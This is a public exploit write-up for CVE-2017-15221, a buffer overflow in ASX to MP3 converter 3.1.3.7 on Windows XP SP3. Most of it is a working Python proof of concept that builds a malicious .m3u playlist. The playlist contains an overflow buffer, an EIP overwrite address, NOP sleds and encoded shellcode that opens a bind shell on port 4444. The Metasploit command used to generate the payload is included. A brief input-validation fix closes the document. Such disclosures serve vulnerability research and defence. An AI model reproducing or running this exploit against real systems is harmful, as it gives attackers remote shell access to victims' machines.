85 lines
No EOL
2.9 KiB
Python
Executable file
85 lines
No EOL
2.9 KiB
Python
Executable file
# Exploit Title: Buffer Overflow via crafted malicious .m3u file
|
|
|
|
|
|
# Exploit Author: Parichay Rai
|
|
|
|
# Tested on: XP Service Pack 3
|
|
|
|
# CVE : CVE-2017-15221
|
|
|
|
Description
|
|
------------
|
|
|
|
A buffer overflow Attack possible due to improper input mechanism
|
|
|
|
Proof of Concept
|
|
----------------
|
|
|
|
#!/usr/bin/python
|
|
|
|
#This exploit generates a malicious playlist for the asx to mp3 converter 3.1.3.7.2010.
|
|
#This is an exploit that work well against a windows XP3 systems!
|
|
#Successful exploit gives you a bind shell on 4444
|
|
|
|
BadChar= "\x00\x0a\x0d\x20"
|
|
|
|
# Payload Generation Command: msfpayload windows/shell_bind_tcp EXITFUNC=none R | msfencode -a x86 -b "\x00\x0a\x0d\x20" -f c
|
|
|
|
# Successful exploitation opens port 4444 on the victim Machine
|
|
|
|
shellcode=("\xd9\xee\xbf\xad\x07\x92\x3e\xd9\x74\x24\xf4\x5e\x2b\xc9" +
|
|
"\xb1\x56\x31\x7e\x18\x03\x7e\x18\x83\xc6\xa9\xe5\x67\xc2" +
|
|
"\x59\x60\x87\x3b\x99\x13\x01\xde\xa8\x01\x75\xaa\x98\x95" +
|
|
"\xfd\xfe\x10\x5d\x53\xeb\xa3\x13\x7c\x1c\x04\x99\x5a\x13" +
|
|
"\x95\x2f\x63\xff\x55\x31\x1f\x02\x89\x91\x1e\xcd\xdc\xd0" +
|
|
"\x67\x30\x2e\x80\x30\x3e\x9c\x35\x34\x02\x1c\x37\x9a\x08" +
|
|
"\x1c\x4f\x9f\xcf\xe8\xe5\x9e\x1f\x40\x71\xe8\x87\xeb\xdd" +
|
|
"\xc9\xb6\x38\x3e\x35\xf0\x35\xf5\xcd\x03\x9f\xc7\x2e\x32" +
|
|
"\xdf\x84\x10\xfa\xd2\xd5\x55\x3d\x0c\xa0\xad\x3d\xb1\xb3" +
|
|
"\x75\x3f\x6d\x31\x68\xe7\xe6\xe1\x48\x19\x2b\x77\x1a\x15" +
|
|
"\x80\xf3\x44\x3a\x17\xd7\xfe\x46\x9c\xd6\xd0\xce\xe6\xfc" +
|
|
"\xf4\x8b\xbd\x9d\xad\x71\x10\xa1\xae\xde\xcd\x07\xa4\xcd" +
|
|
"\x1a\x31\xe7\x99\xef\x0c\x18\x5a\x67\x06\x6b\x68\x28\xbc" +
|
|
"\xe3\xc0\xa1\x1a\xf3\x27\x98\xdb\x6b\xd6\x22\x1c\xa5\x1d" +
|
|
"\x76\x4c\xdd\xb4\xf6\x07\x1d\x38\x23\x87\x4d\x96\x9b\x68" +
|
|
"\x3e\x56\x4b\x01\x54\x59\xb4\x31\x57\xb3\xc3\x75\x99\xe7" +
|
|
"\x80\x11\xd8\x17\x37\xbe\x55\xf1\x5d\x2e\x30\xa9\xc9\x8c" +
|
|
"\x67\x62\x6e\xee\x4d\xde\x27\x78\xd9\x08\xff\x87\xda\x1e" +
|
|
"\xac\x24\x72\xc9\x26\x27\x47\xe8\x39\x62\xef\x63\x02\xe5" +
|
|
"\x65\x1a\xc1\x97\x7a\x37\xb1\x34\xe8\xdc\x41\x32\x11\x4b" +
|
|
"\x16\x13\xe7\x82\xf2\x89\x5e\x3d\xe0\x53\x06\x06\xa0\x8f" +
|
|
"\xfb\x89\x29\x5d\x47\xae\x39\x9b\x48\xea\x6d\x73\x1f\xa4" +
|
|
"\xdb\x35\xc9\x06\xb5\xef\xa6\xc0\x51\x69\x85\xd2\x27\x76" +
|
|
"\xc0\xa4\xc7\xc7\xbd\xf0\xf8\xe8\x29\xf5\x81\x14\xca\xfa" +
|
|
"\x58\x9d\xa0\xc0\x80\xbf\xdc\x6c\xd1\xfd\x80\x8e\x0c\xc1" +
|
|
"\xbc\x0c\xa4\xba\x3a\x0c\xcd\xbf\x07\x8a\x3e\xb2\x18\x7f" +
|
|
"\x40\x61\x18\xaa")
|
|
|
|
buffer="http://"
|
|
buffer+="A"*17417
|
|
buffer+="\x53\x93\x42\x7e" #(overwrites EIP in windows XP service pack 3 with the address of user32.dll)
|
|
buffer+="\x90"*10 #NOPs
|
|
buffer+=shellcode
|
|
buffer+="\x90"*10 #NOPs
|
|
f=open("exploit.m3u","w")
|
|
f.write(buffer);
|
|
f.close()
|
|
|
|
----------------------
|
|
Affected Targets
|
|
---------------------
|
|
|
|
ASX to MP3 version 3.1.3.7 and May be less
|
|
|
|
|
|
Solution
|
|
---------------
|
|
|
|
Validate input to prevent unexpected data from being processed, such as being too long, of the wrong data type, containing "junk" characters, etc.
|
|
|
|
|
|
Credits
|
|
----------
|
|
|
|
Offensive Security
|
|
Rebellious Ceaser |